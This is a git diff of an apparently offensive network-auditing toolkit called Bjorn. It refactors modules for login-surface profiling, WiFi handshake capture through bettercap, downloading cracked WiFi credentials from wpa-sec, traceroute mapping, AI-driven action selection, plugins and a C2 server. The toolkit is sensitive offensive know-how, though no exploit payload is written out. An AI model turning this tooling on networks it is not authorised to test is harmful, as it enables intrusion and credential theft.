b_name = "Web Login Profiler"
|
||||
b_description = "Detects login forms and auth controls on web endpoints."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "WebLoginProfiler.png"
|
||||
|
||||
# Small curated list, cheap but high signal.
|
||||
DEFAULT_PATHS = [
|
||||
@@ -309,6 +313,9 @@ class WebLoginProfiler:
|
||||
# "success" means: profiler ran; not that a login exists.
|
||||
logger.info(f"WebLoginProfiler done for {ip}:{port_i} (login_surfaces={found_login})")
|
||||
return "success"
|
||||
except Exception as e:
|
||||
logger.error(f"WebLoginProfiler failed for {ip}:{port_i}: {e}")
|
||||
return "failed"
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,14 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
web_surface_mapper.py — Post-profiler web surface scoring (no exploitation).
|
||||
|
||||
Trigger idea: run after WebLoginProfiler to compute a summary and a "risk score"
|
||||
from recent webenum rows written by tool='login_profiler'.
|
||||
|
||||
Writes one summary row into `webenum` (tool='surface_mapper') so it appears in UI.
|
||||
Updates EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
|
||||
"""
|
||||
"""web_surface_mapper.py - Aggregate login_profiler findings into a per-target risk score."""
|
||||
|
||||
import json
|
||||
import logging
|
||||
@@ -33,6 +25,17 @@ b_action = "normal"
|
||||
b_cooldown = 600
|
||||
b_rate_limit = "48/86400"
|
||||
b_enabled = 1
|
||||
b_timeout = 300
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 6
|
||||
b_risk_level = "low"
|
||||
b_tags = ["web", "login", "risk", "mapper"]
|
||||
b_category = "recon"
|
||||
b_name = "Web Surface Mapper"
|
||||
b_description = "Aggregates login profiler findings into a per-target risk score."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "WebSurfaceMapper.png"
|
||||
|
||||
|
||||
def _scheme_for_port(port: int) -> str:
|
||||
@@ -226,6 +229,9 @@ class WebSurfaceMapper:
|
||||
|
||||
progress.set_complete()
|
||||
return "success"
|
||||
except Exception as e:
|
||||
logger.error(f"WebSurfaceMapper failed for {ip}:{port_i}: {e}")
|
||||
return "failed"
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
# wpasec_potfiles.py
|
||||
# WPAsec Potfile Manager - Download, clean, import, or erase WiFi credentials
|
||||
"""wpasec_potfiles.py - Download, clean, import, or erase WiFi credentials from wpa-sec.stanev.org."""
|
||||
|
||||
import os
|
||||
import json
|
||||
@@ -25,6 +24,19 @@ b_description = (
|
||||
b_author = "Infinition"
|
||||
b_version = "1.0.0"
|
||||
b_icon = f"/actions_icons/{b_class}.png"
|
||||
b_port = None
|
||||
b_service = "[]"
|
||||
b_trigger = None
|
||||
b_priority = 30
|
||||
b_timeout = 300
|
||||
b_cooldown = 3600
|
||||
b_stealth_level = 10
|
||||
b_risk_level = "low"
|
||||
b_status = "wpasec_potfiles"
|
||||
b_parent = None
|
||||
b_rate_limit = None
|
||||
b_max_retries = 1
|
||||
b_tags = ["wifi", "wpa", "potfile", "credentials"]
|
||||
b_docs_url = "https://wpa-sec.stanev.org/?api"
|
||||
|
||||
b_args = {
|
||||
@@ -110,8 +122,8 @@ def compute_dynamic_b_args(base: dict) -> dict:
|
||||
|
||||
# ── CLASS IMPLEMENTATION ─────────────────────────────────────────────────────
|
||||
class WPAsecPotfileManager:
|
||||
DEFAULT_SAVE_DIR = "/home/bjorn/Bjorn/data/input/potfiles"
|
||||
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
DEFAULT_SAVE_DIR = os.path.join(os.path.expanduser("~"), "Bjorn", "data", "input", "potfiles")
|
||||
DEFAULT_SETTINGS_DIR = os.path.join(os.path.expanduser("~"), ".settings_bjorn")
|
||||
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "wpasec_settings.json")
|
||||
DOWNLOAD_URL = "https://wpa-sec.stanev.org/?api&dl=1"
|
||||
|
||||
@@ -121,7 +133,6 @@ class WPAsecPotfileManager:
|
||||
Even if unused here, we store it for compatibility.
|
||||
"""
|
||||
self.shared_data = shared_data
|
||||
logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")
|
||||
|
||||
# --- Orchestrator entry point ---
|
||||
def execute(self, ip=None, port=None, row=None, status_key=None):
|
||||
@@ -130,16 +141,23 @@ class WPAsecPotfileManager:
|
||||
By default: download latest potfile if API key is available.
|
||||
"""
|
||||
self.shared_data.bjorn_orch_status = "WPAsecPotfileManager"
|
||||
self.shared_data.comment_params = {"ip": ip, "port": port}
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"action": "download", "status": "starting"}
|
||||
|
||||
api_key = self.load_api_key()
|
||||
if api_key:
|
||||
logging.info("WPAsecPotfileManager: downloading latest potfile (orchestrator trigger).")
|
||||
self.download_potfile(self.DEFAULT_SAVE_DIR, api_key)
|
||||
return "success"
|
||||
else:
|
||||
logging.warning("WPAsecPotfileManager: no API key found, nothing done.")
|
||||
return "failed"
|
||||
try:
|
||||
api_key = self.load_api_key()
|
||||
if api_key:
|
||||
logging.info("WPAsecPotfileManager: downloading latest potfile (orchestrator trigger).")
|
||||
self.download_potfile(self.DEFAULT_SAVE_DIR, api_key)
|
||||
# EPD live status update
|
||||
self.shared_data.comment_params = {"action": "download", "status": "complete"}
|
||||
return "success"
|
||||
else:
|
||||
logging.warning("WPAsecPotfileManager: no API key found, nothing done.")
|
||||
return "failed"
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
# --- API Key Handling ---
|
||||
def save_api_key(self, api_key: str):
|
||||
|
||||
@@ -1,19 +1,8 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
yggdrasil_mapper.py -- Network topology mapper (Pi Zero friendly, orchestrator compatible).
|
||||
"""yggdrasil_mapper.py - Traceroute-based network topology mapping to JSON.
|
||||
|
||||
What it does:
|
||||
- Phase 1: Traceroute via scapy ICMP (fallback: subprocess traceroute) to discover
|
||||
the routing path to the target IP. Records hop IPs and RTT per hop.
|
||||
- Phase 2: Service enrichment -- reads existing port data from DB hosts table and
|
||||
optionally verifies a handful of key ports with TCP connect probes.
|
||||
- Phase 3: Builds a topology graph data structure (nodes + edges + metadata).
|
||||
- Phase 4: Aggregates with topology data from previous runs (merge / deduplicate).
|
||||
- Phase 5: Saves the combined topology as JSON to data/output/topology/.
|
||||
|
||||
No matplotlib or networkx dependency -- pure JSON output.
|
||||
Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
|
||||
Uses scapy ICMP (fallback: subprocess) and merges results across runs.
|
||||
"""
|
||||
|
||||
import json
|
||||
@@ -105,7 +94,7 @@ b_examples = [
|
||||
b_docs_url = "docs/actions/YggdrasilMapper.md"
|
||||
|
||||
# -------------------- Constants --------------------
|
||||
_DATA_DIR = "/home/bjorn/Bjorn/data"
|
||||
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
|
||||
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "topology")
|
||||
|
||||
# Ports to verify during service enrichment (small set to stay Pi Zero friendly).
|
||||
@@ -423,8 +412,8 @@ class YggdrasilMapper:
|
||||
|
||||
# Query DB for known ports to prioritize probing
|
||||
db_ports = []
|
||||
host_data = None
|
||||
try:
|
||||
# mac is available in the scope
|
||||
host_data = self.shared_data.db.get_host_by_mac(mac)
|
||||
if host_data and host_data.get("ports"):
|
||||
# Normalize ports from DB string
|
||||
|
||||
50
ai_engine.py
50
ai_engine.py
@@ -1,26 +1,6 @@
|
||||
"""
|
||||
ai_engine.py - Dynamic AI Decision Engine for Bjorn
|
||||
═══════════════════════════════════════════════════════════════════════════
|
||||
"""ai_engine.py - Lightweight AI decision engine for action selection on Pi Zero.
|
||||
|
||||
Purpose:
|
||||
Lightweight AI decision engine for Raspberry Pi Zero.
|
||||
Works in tandem with deep learning model trained on external PC.
|
||||
|
||||
Architecture:
|
||||
- Lightweight inference engine (no TensorFlow/PyTorch on Pi)
|
||||
- Loads pre-trained model weights from PC
|
||||
- Real-time action selection
|
||||
- Automatic feature extraction
|
||||
- Fallback to heuristics when model unavailable
|
||||
|
||||
Model Pipeline:
|
||||
1. Pi: Collect data → Export → Transfer to PC
|
||||
2. PC: Train deep neural network → Export lightweight model
|
||||
3. Pi: Load model → Use for decision making
|
||||
4. Repeat: Continuous learning cycle
|
||||
|
||||
Author: Bjorn Team
|
||||
Version: 2.0.0
|
||||
Loads pre-trained model weights from PC; falls back to heuristics when unavailable.
|
||||
"""
|
||||
|
||||
import json
|
||||
@@ -141,7 +121,7 @@ class BjornAIEngine:
|
||||
new_weights = {
|
||||
k: np.array(v) for k, v in weights_data.items()
|
||||
}
|
||||
del weights_data # Free raw dict — numpy arrays are the canonical form
|
||||
del weights_data # Free raw dict - numpy arrays are the canonical form
|
||||
|
||||
# AI-03: Save previous model for rollback
|
||||
if self.model_loaded and self.model_weights is not None:
|
||||
@@ -263,7 +243,7 @@ class BjornAIEngine:
|
||||
self._performance_window.append(reward)
|
||||
|
||||
# Update current history entry
|
||||
if self._model_history:
|
||||
if self._model_history and len(self._performance_window) > 0:
|
||||
self._model_history[-1]['avg_reward'] = round(
|
||||
sum(self._performance_window) / len(self._performance_window), 2
|
||||
)
|
||||
@@ -345,7 +325,14 @@ class BjornAIEngine:
|
||||
|
||||
current_version = str(self.model_config.get("version", "0")).strip() if self.model_config else "0"
|
||||
|
||||
if remote_version > current_version:
|
||||
def _version_tuple(v: str) -> tuple:
|
||||
"""Parse version string like '1.2.3' into comparable tuple (1, 2, 3)."""
|
||||
try:
|
||||
return tuple(int(x) for x in v.split('.'))
|
||||
except (ValueError, AttributeError):
|
||||
return (0,)
|
||||
|
||||
if _version_tuple(remote_version) > _version_tuple(current_version):
|
||||
logger.info(f"New model available: {remote_version} (Local: {current_version})")
|
||||
|
||||
# Download config (stream to avoid loading the whole file into RAM)
|
||||
@@ -625,7 +612,7 @@ class BjornAIEngine:
|
||||
def _get_temporal_context(self, mac: str) -> Dict:
|
||||
"""
|
||||
Collect real temporal features for a MAC from DB.
|
||||
same_action_attempts / is_retry are action-specific — they are NOT
|
||||
same_action_attempts / is_retry are action-specific - they are NOT
|
||||
included here; instead they are merged from _get_action_context()
|
||||
inside the per-action loop in _predict_with_model().
|
||||
"""
|
||||
@@ -930,9 +917,14 @@ class BjornAIEngine:
|
||||
best_action = max(action_scores, key=action_scores.get)
|
||||
best_score = action_scores[best_action]
|
||||
|
||||
# Normalize score to 0-1
|
||||
if best_score > 0:
|
||||
best_score = min(best_score / 1.0, 1.0)
|
||||
# Normalize score to 0-1 range
|
||||
# Static heuristic scores can exceed 1.0 when multiple port/service
|
||||
# rules match, so we normalize by the maximum observed score.
|
||||
if best_score > 1.0:
|
||||
all_vals = action_scores.values()
|
||||
max_val = max(all_vals) if all_vals else 1.0
|
||||
best_score = best_score / max_val if max_val > 0 else 1.0
|
||||
best_score = min(best_score, 1.0)
|
||||
|
||||
debug_info = {
|
||||
'method': 'heuristics_bootstrap' if bootstrap_used else 'heuristics',
|
||||
|
||||
@@ -1,6 +1,4 @@
|
||||
"""
|
||||
ai_utils.py - Shared AI utilities for Bjorn
|
||||
"""
|
||||
"""ai_utils.py - Shared feature extraction and encoding helpers for the AI engine."""
|
||||
|
||||
import json
|
||||
import numpy as np
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
"""
|
||||
Bifrost — Pwnagotchi-compatible WiFi recon engine for Bjorn.
|
||||
"""__init__.py - Bifrost, pwnagotchi-compatible WiFi recon engine for Bjorn.
|
||||
|
||||
Runs as a daemon thread alongside MANUAL/AUTO/AI modes.
|
||||
"""
|
||||
import os
|
||||
@@ -42,7 +42,7 @@ class BifrostEngine:
|
||||
|
||||
# Wait for any previous thread to finish before re-starting
|
||||
if self._thread and self._thread.is_alive():
|
||||
logger.warning("Previous Bifrost thread still running — waiting ...")
|
||||
logger.warning("Previous Bifrost thread still running - waiting ...")
|
||||
self._stop_event.set()
|
||||
self._thread.join(timeout=15)
|
||||
|
||||
@@ -82,7 +82,7 @@ class BifrostEngine:
|
||||
logger.info("Bifrost engine stopped")
|
||||
|
||||
def _loop(self):
|
||||
"""Main daemon loop — setup monitor mode, start bettercap, create agent, run recon cycle."""
|
||||
"""Main daemon loop - setup monitor mode, start bettercap, create agent, run recon cycle."""
|
||||
try:
|
||||
# Install compatibility shim for pwnagotchi plugins
|
||||
from bifrost import plugins as bfplugins
|
||||
@@ -94,15 +94,15 @@ class BifrostEngine:
|
||||
|
||||
if self._monitor_failed:
|
||||
logger.error(
|
||||
"Monitor mode setup failed — Bifrost cannot operate without monitor "
|
||||
"Monitor mode setup failed - Bifrost cannot operate without monitor "
|
||||
"mode. For Broadcom chips (Pi Zero W/2W), install nexmon: "
|
||||
"https://github.com/seemoo-lab/nexmon — "
|
||||
"https://github.com/seemoo-lab/nexmon - "
|
||||
"Or use an external USB WiFi adapter with monitor mode support.")
|
||||
# Teardown first (restores network services) BEFORE switching mode,
|
||||
# so the orchestrator doesn't start scanning on a dead network.
|
||||
self._teardown_monitor_mode()
|
||||
self._running = False
|
||||
# Now switch mode back to AUTO — the network should be restored.
|
||||
# Now switch mode back to AUTO - the network should be restored.
|
||||
# We set the flag directly FIRST (bypass setter to avoid re-stopping),
|
||||
# then ensure manual_mode/ai_mode are cleared so getter returns AUTO.
|
||||
try:
|
||||
@@ -112,7 +112,7 @@ class BifrostEngine:
|
||||
self.shared_data.manual_mode = False
|
||||
self.shared_data.ai_mode = False
|
||||
self.shared_data.invalidate_config_cache()
|
||||
logger.info("Bifrost auto-disabled due to monitor mode failure — mode: AUTO")
|
||||
logger.info("Bifrost auto-disabled due to monitor mode failure - mode: AUTO")
|
||||
except Exception:
|
||||
pass
|
||||
return
|
||||
@@ -133,7 +133,7 @@ class BifrostEngine:
|
||||
# Initialize agent
|
||||
self.agent.start()
|
||||
|
||||
logger.info("Bifrost agent started — entering recon cycle")
|
||||
logger.info("Bifrost agent started - entering recon cycle")
|
||||
|
||||
# Main recon loop (port of do_auto_mode from pwnagotchi)
|
||||
while not self._stop_event.is_set():
|
||||
@@ -208,7 +208,7 @@ class BifrostEngine:
|
||||
return True
|
||||
except Exception:
|
||||
pass
|
||||
# nexutil exists — assume usable even without dmesg confirmation
|
||||
# nexutil exists - assume usable even without dmesg confirmation
|
||||
return True
|
||||
|
||||
@staticmethod
|
||||
@@ -239,10 +239,10 @@ class BifrostEngine:
|
||||
"""Put the WiFi interface into monitor mode.
|
||||
|
||||
Strategy order:
|
||||
1. Nexmon — for Broadcom brcmfmac chips (Pi Zero W / Pi Zero 2 W)
|
||||
1. Nexmon - for Broadcom brcmfmac chips (Pi Zero W / Pi Zero 2 W)
|
||||
Uses: iw phy <phy> interface add mon0 type monitor + nexutil -m2
|
||||
2. airmon-ng — for chipsets with proper driver support (Atheros, Realtek, etc.)
|
||||
3. iw — direct fallback for other drivers
|
||||
2. airmon-ng - for chipsets with proper driver support (Atheros, Realtek, etc.)
|
||||
3. iw - direct fallback for other drivers
|
||||
"""
|
||||
self._monitor_torn_down = False
|
||||
self._nexmon_used = False
|
||||
@@ -270,7 +270,7 @@ class BifrostEngine:
|
||||
if self._has_nexmon():
|
||||
if self._setup_nexmon(base_iface, cfg):
|
||||
return
|
||||
# nexmon setup failed — don't try other strategies, they won't work either
|
||||
# nexmon setup failed - don't try other strategies, they won't work either
|
||||
self._monitor_failed = True
|
||||
return
|
||||
else:
|
||||
@@ -410,7 +410,7 @@ class BifrostEngine:
|
||||
logger.error("Monitor interface %s not created", mon_iface)
|
||||
return False
|
||||
|
||||
# Success — update config to use mon0
|
||||
# Success - update config to use mon0
|
||||
cfg['bifrost_iface'] = mon_iface
|
||||
self._mon_iface = mon_iface
|
||||
self._nexmon_used = True
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
"""
|
||||
Bifrost — WiFi recon agent.
|
||||
"""agent.py - Bifrost WiFi recon agent.
|
||||
|
||||
Ported from pwnagotchi/agent.py using composition instead of inheritance.
|
||||
"""
|
||||
import time
|
||||
@@ -22,7 +22,7 @@ logger = Logger(name="bifrost.agent", level=logging.DEBUG)
|
||||
|
||||
|
||||
class BifrostAgent:
|
||||
"""WiFi recon agent — drives bettercap, captures handshakes, tracks epochs."""
|
||||
"""WiFi recon agent - drives bettercap, captures handshakes, tracks epochs."""
|
||||
|
||||
def __init__(self, shared_data, stop_event=None):
|
||||
self.shared_data = shared_data
|
||||
@@ -170,7 +170,7 @@ class BifrostAgent:
|
||||
err_msg = str(e)
|
||||
if 'Operation not supported' in err_msg or 'EOPNOTSUPP' in err_msg:
|
||||
logger.error(
|
||||
"wifi.recon failed: %s — Your WiFi chip likely does NOT support "
|
||||
"wifi.recon failed: %s - Your WiFi chip likely does NOT support "
|
||||
"monitor mode. The built-in Broadcom chip on Raspberry Pi Zero/Zero 2 "
|
||||
"has limited monitor mode support. Use an external USB WiFi adapter "
|
||||
"(e.g. Alfa AWUS036ACH, Panda PAU09) that supports monitor mode and "
|
||||
@@ -362,7 +362,7 @@ class BifrostAgent:
|
||||
logger.error("Error setting channel: %s", e)
|
||||
|
||||
def next_epoch(self):
|
||||
"""Transition to next epoch — evaluate mood."""
|
||||
"""Transition to next epoch - evaluate mood."""
|
||||
self.automata.next_epoch(self.epoch)
|
||||
# Persist epoch to DB
|
||||
data = self.epoch.data()
|
||||
@@ -393,7 +393,7 @@ class BifrostAgent:
|
||||
has_ws = True
|
||||
except ImportError:
|
||||
has_ws = False
|
||||
logger.warning("websockets package not installed — using REST event polling "
|
||||
logger.warning("websockets package not installed - using REST event polling "
|
||||
"(pip install websockets for real-time events)")
|
||||
|
||||
if has_ws:
|
||||
@@ -417,7 +417,7 @@ class BifrostAgent:
|
||||
loop.close()
|
||||
|
||||
def _rest_event_loop(self):
|
||||
"""REST-based fallback event poller — polls /api/events every 2s."""
|
||||
"""REST-based fallback event poller - polls /api/events every 2s."""
|
||||
while not self._stop_event.is_set():
|
||||
try:
|
||||
events = self.bettercap.events()
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
"""
|
||||
Bifrost — Mood state machine.
|
||||
"""automata.py - Bifrost mood state machine.
|
||||
|
||||
Ported from pwnagotchi/automata.py.
|
||||
"""
|
||||
import logging
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
"""
|
||||
Bifrost — Bettercap REST API client.
|
||||
"""bettercap.py - Bifrost bettercap REST API client.
|
||||
|
||||
Ported from pwnagotchi/bettercap.py using urllib (no requests dependency).
|
||||
"""
|
||||
import json
|
||||
@@ -54,16 +54,16 @@ class BettercapClient:
|
||||
raise Exception("bettercap unreachable: %s" % e.reason)
|
||||
|
||||
def session(self):
|
||||
"""GET /api/session — current bettercap state."""
|
||||
"""GET /api/session - current bettercap state."""
|
||||
return self._request('GET', '/session')
|
||||
|
||||
def run(self, command, verbose_errors=True):
|
||||
"""POST /api/session — execute a bettercap command."""
|
||||
"""POST /api/session - execute a bettercap command."""
|
||||
return self._request('POST', '/session', {'cmd': command},
|
||||
verbose_errors=verbose_errors)
|
||||
|
||||
def events(self):
|
||||
"""GET /api/events — poll recent events (REST fallback)."""
|
||||
"""GET /api/events - poll recent events (REST fallback)."""
|
||||
try:
|
||||
result = self._request('GET', '/events', verbose_errors=False)
|
||||
# Clear after reading so we don't reprocess
|
||||
@@ -80,7 +80,7 @@ class BettercapClient:
|
||||
|
||||
Args:
|
||||
consumer: async callable that receives each message string.
|
||||
stop_event: optional threading.Event — exit when set.
|
||||
stop_event: optional threading.Event - exit when set.
|
||||
"""
|
||||
import websockets
|
||||
import asyncio
|
||||
@@ -99,5 +99,5 @@ class BettercapClient:
|
||||
except Exception as ex:
|
||||
if stop_event and stop_event.is_set():
|
||||
return
|
||||
logger.debug("Websocket error: %s — reconnecting...", ex)
|
||||
logger.debug("Websocket error: %s - reconnecting...", ex)
|
||||
await asyncio.sleep(2)
|
||||
|
||||
@@ -1,7 +1,6 @@
|
||||
"""
|
||||
Bifrost — Pwnagotchi compatibility shim.
|
||||
Registers `pwnagotchi` in sys.modules so existing plugins can
|
||||
`import pwnagotchi` and get Bifrost-backed implementations.
|
||||
"""compat.py - Pwnagotchi compatibility shim.
|
||||
|
||||
Registers `pwnagotchi` in sys.modules so existing plugins resolve to Bifrost.
|
||||
"""
|
||||
import sys
|
||||
import time
|
||||
@@ -56,7 +55,7 @@ def install_shim(shared_data, bifrost_plugins_module):
|
||||
return 0.0
|
||||
|
||||
def _reboot():
|
||||
pass # no-op in Bifrost — we don't auto-reboot
|
||||
pass # no-op in Bifrost - we don't auto-reboot
|
||||
|
||||
pwn.name = _name
|
||||
pwn.set_name = _set_name
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
"""
|
||||
Bifrost — Epoch tracking.
|
||||
"""epoch.py - Bifrost epoch tracking and reward signals.
|
||||
|
||||
Ported from pwnagotchi/ai/epoch.py + pwnagotchi/ai/reward.py.
|
||||
"""
|
||||
import time
|
||||
@@ -17,7 +17,7 @@ NUM_CHANNELS = 14 # 2.4 GHz channels
|
||||
# ── Reward function (from pwnagotchi/ai/reward.py) ──────────────
|
||||
|
||||
class RewardFunction:
|
||||
"""Reward signal for RL — higher is better."""
|
||||
"""Reward signal for RL - higher is better."""
|
||||
|
||||
def __call__(self, epoch_n, state):
|
||||
eps = 1e-20
|
||||
@@ -181,7 +181,7 @@ class BifrostEpoch:
|
||||
self.num_slept += inc
|
||||
|
||||
def next(self):
|
||||
"""Transition to next epoch — compute reward, update streaks, reset counters."""
|
||||
"""Transition to next epoch - compute reward, update streaks, reset counters."""
|
||||
# Update activity streaks
|
||||
if not self.any_activity and not self.did_handshakes:
|
||||
self.inactive_for += 1
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
"""
|
||||
Bifrost — ASCII face definitions.
|
||||
"""faces.py - Bifrost ASCII face definitions.
|
||||
|
||||
Ported from pwnagotchi/ui/faces.py with full face set.
|
||||
"""
|
||||
|
||||
|
||||
@@ -1,7 +1,6 @@
|
||||
"""
|
||||
Bifrost — Plugin system.
|
||||
"""plugins.py - Bifrost plugin system.
|
||||
|
||||
Ported from pwnagotchi/plugins/__init__.py with ThreadPoolExecutor.
|
||||
Compatible with existing pwnagotchi plugin files.
|
||||
"""
|
||||
import os
|
||||
import glob
|
||||
@@ -130,7 +129,7 @@ def load_from_path(path, enabled=()):
|
||||
if not path or not os.path.isdir(path):
|
||||
return loaded
|
||||
|
||||
logger.debug("loading plugins from %s — enabled: %s", path, enabled)
|
||||
logger.debug("loading plugins from %s - enabled: %s", path, enabled)
|
||||
for filename in glob.glob(os.path.join(path, "*.py")):
|
||||
plugin_name = os.path.basename(filename.replace(".py", ""))
|
||||
database[plugin_name] = filename
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
"""
|
||||
Bifrost — Voice / status messages.
|
||||
"""voice.py - Bifrost voice / status messages.
|
||||
|
||||
Ported from pwnagotchi/voice.py, uses random choice for personality.
|
||||
"""
|
||||
import random
|
||||
|
||||
156
bjorn_plugin.py
Normal file
156
bjorn_plugin.py
Normal file
@@ -0,0 +1,156 @@
|
||||
"""bjorn_plugin.py - Base class and helpers for Bjorn plugins."""
|
||||
|
||||
import logging
|
||||
from typing import Any, Dict, Optional
|
||||
|
||||
from logger import Logger
|
||||
|
||||
|
||||
class PluginLogger:
|
||||
"""Per-plugin logger that prefixes all messages with the plugin ID.
|
||||
Caches Logger instances by name to prevent handler accumulation on reload."""
|
||||
|
||||
_cache: dict = {} # class-level cache: name -> Logger instance
|
||||
|
||||
def __init__(self, plugin_id: str):
|
||||
name = f"plugin.{plugin_id}"
|
||||
if name not in PluginLogger._cache:
|
||||
PluginLogger._cache[name] = Logger(name=name, level=logging.DEBUG)
|
||||
self._logger = PluginLogger._cache[name]
|
||||
|
||||
def info(self, msg: str):
|
||||
self._logger.info(msg)
|
||||
|
||||
def warning(self, msg: str):
|
||||
self._logger.warning(msg)
|
||||
|
||||
def error(self, msg: str):
|
||||
self._logger.error(msg)
|
||||
|
||||
def debug(self, msg: str):
|
||||
self._logger.debug(msg)
|
||||
|
||||
def success(self, msg: str):
|
||||
self._logger.success(msg)
|
||||
|
||||
|
||||
class BjornPlugin:
|
||||
"""
|
||||
Base class every Bjorn plugin must extend.
|
||||
|
||||
Provides:
|
||||
- Access to shared_data, database, and config
|
||||
- Convenience wrappers for status/progress/comment
|
||||
- Hook methods to override for event-driven behavior
|
||||
- Standard action interface (execute) for action-type plugins
|
||||
|
||||
Usage:
|
||||
class MyPlugin(BjornPlugin):
|
||||
def setup(self):
|
||||
self.log.info("Ready!")
|
||||
|
||||
def on_credential_found(self, cred):
|
||||
self.log.info(f"New cred: {cred}")
|
||||
"""
|
||||
|
||||
def __init__(self, shared_data, meta: dict, config: dict):
|
||||
"""
|
||||
Args:
|
||||
shared_data: The global SharedData singleton.
|
||||
meta: Parsed plugin.json manifest.
|
||||
config: User-editable config values (from DB, merged with schema defaults).
|
||||
"""
|
||||
self.shared_data = shared_data
|
||||
self.meta = meta
|
||||
self.config = config
|
||||
self.db = shared_data.db
|
||||
self.log = PluginLogger(meta.get("id", "unknown"))
|
||||
self.timeout = (meta.get("action") or {}).get("timeout", 300)
|
||||
self._plugin_id = meta.get("id", "unknown")
|
||||
|
||||
# ── Convenience wrappers ─────────────────────────────────────────
|
||||
|
||||
def set_progress(self, pct: str):
|
||||
"""Update the global progress indicator (e.g., '42%')."""
|
||||
self.shared_data.bjorn_progress = pct
|
||||
|
||||
def set_status(self, text: str):
|
||||
"""Update the main status text shown on display and web UI."""
|
||||
self.shared_data.bjorn_status_text = text
|
||||
|
||||
def set_comment(self, **params):
|
||||
"""Update the EPD comment parameters."""
|
||||
self.shared_data.comment_params = params
|
||||
|
||||
# ── Lifecycle ────────────────────────────────────────────────────
|
||||
|
||||
def setup(self) -> None:
|
||||
"""Called once when the plugin is loaded. Override to initialize resources."""
|
||||
pass
|
||||
|
||||
def teardown(self) -> None:
|
||||
"""Called when the plugin is unloaded or Bjorn shuts down. Override to cleanup."""
|
||||
pass
|
||||
|
||||
# ── Action interface (type="action" plugins only) ────────────────
|
||||
|
||||
def execute(self, ip: str, port: str, row: dict, status_key: str) -> str:
|
||||
"""
|
||||
Called by the orchestrator for action-type plugins.
|
||||
|
||||
Args:
|
||||
ip: Target IP address.
|
||||
port: Target port (may be empty string).
|
||||
row: Dict with keys: MAC Address, IPs, Ports, Alive.
|
||||
status_key: Action class name (for status tracking).
|
||||
|
||||
Returns:
|
||||
'success' or 'failed' (string, case-sensitive).
|
||||
"""
|
||||
raise NotImplementedError(
|
||||
f"Plugin {self._plugin_id} is type='action' but does not implement execute()"
|
||||
)
|
||||
|
||||
# ── Hook methods (override selectively) ──────────────────────────
|
||||
|
||||
def on_host_discovered(self, host: dict) -> None:
|
||||
"""Hook: called when a new host is found by the scanner.
|
||||
|
||||
Args:
|
||||
host: Dict with mac_address, ips, hostnames, vendor, etc.
|
||||
"""
|
||||
pass
|
||||
|
||||
def on_credential_found(self, cred: dict) -> None:
|
||||
"""Hook: called when new credentials are discovered.
|
||||
|
||||
Args:
|
||||
cred: Dict with service, mac, ip, user, password, port.
|
||||
"""
|
||||
pass
|
||||
|
||||
def on_vulnerability_found(self, vuln: dict) -> None:
|
||||
"""Hook: called when a new vulnerability is found.
|
||||
|
||||
Args:
|
||||
vuln: Dict with ip, port, cve_id, severity, description.
|
||||
"""
|
||||
pass
|
||||
|
||||
def on_action_complete(self, action_name: str, success: bool, target: dict) -> None:
|
||||
"""Hook: called after any action finishes execution.
|
||||
|
||||
Args:
|
||||
action_name: The b_class of the action that completed.
|
||||
success: True if action returned 'success'.
|
||||
target: Dict with mac, ip, port.
|
||||
"""
|
||||
pass
|
||||
|
||||
def on_scan_complete(self, results: dict) -> None:
|
||||
"""Hook: called after a network scan cycle finishes.
|
||||
|
||||
Args:
|
||||
results: Dict with hosts_found, new_hosts, scan_duration, etc.
|
||||
"""
|
||||
pass
|
||||
@@ -1,8 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
c2_manager.py — Professional Command & Control Server
|
||||
"""
|
||||
"""c2_manager.py - Command & Control server for multi-agent coordination over SSH."""
|
||||
|
||||
# ==== Stdlib ====
|
||||
import base64
|
||||
@@ -28,7 +26,7 @@ import paramiko
|
||||
from cryptography.fernet import Fernet, InvalidToken
|
||||
|
||||
# ==== Project ====
|
||||
from init_shared import shared_data # requis (non optionnel)
|
||||
from init_shared import shared_data # required
|
||||
from logger import Logger
|
||||
|
||||
# -----------------------------------------------------
|
||||
@@ -38,19 +36,15 @@ BASE_DIR = Path(__file__).resolve().parent
|
||||
|
||||
def _resolve_data_root() -> Path:
|
||||
"""
|
||||
Résout le répertoire racine des données pour le C2, sans crasher
|
||||
si shared_data n'a pas encore data_dir prêt.
|
||||
Ordre de priorité :
|
||||
1) shared_data.data_dir si présent
|
||||
2) $BJORN_DATA_DIR si défini
|
||||
3) BASE_DIR (fallback local)
|
||||
Resolve C2 data root directory without crashing if shared_data isn't ready.
|
||||
Priority: shared_data.data_dir > $BJORN_DATA_DIR > BASE_DIR (local fallback)
|
||||
"""
|
||||
sd_dir = getattr(shared_data, "data_dir", None)
|
||||
if sd_dir:
|
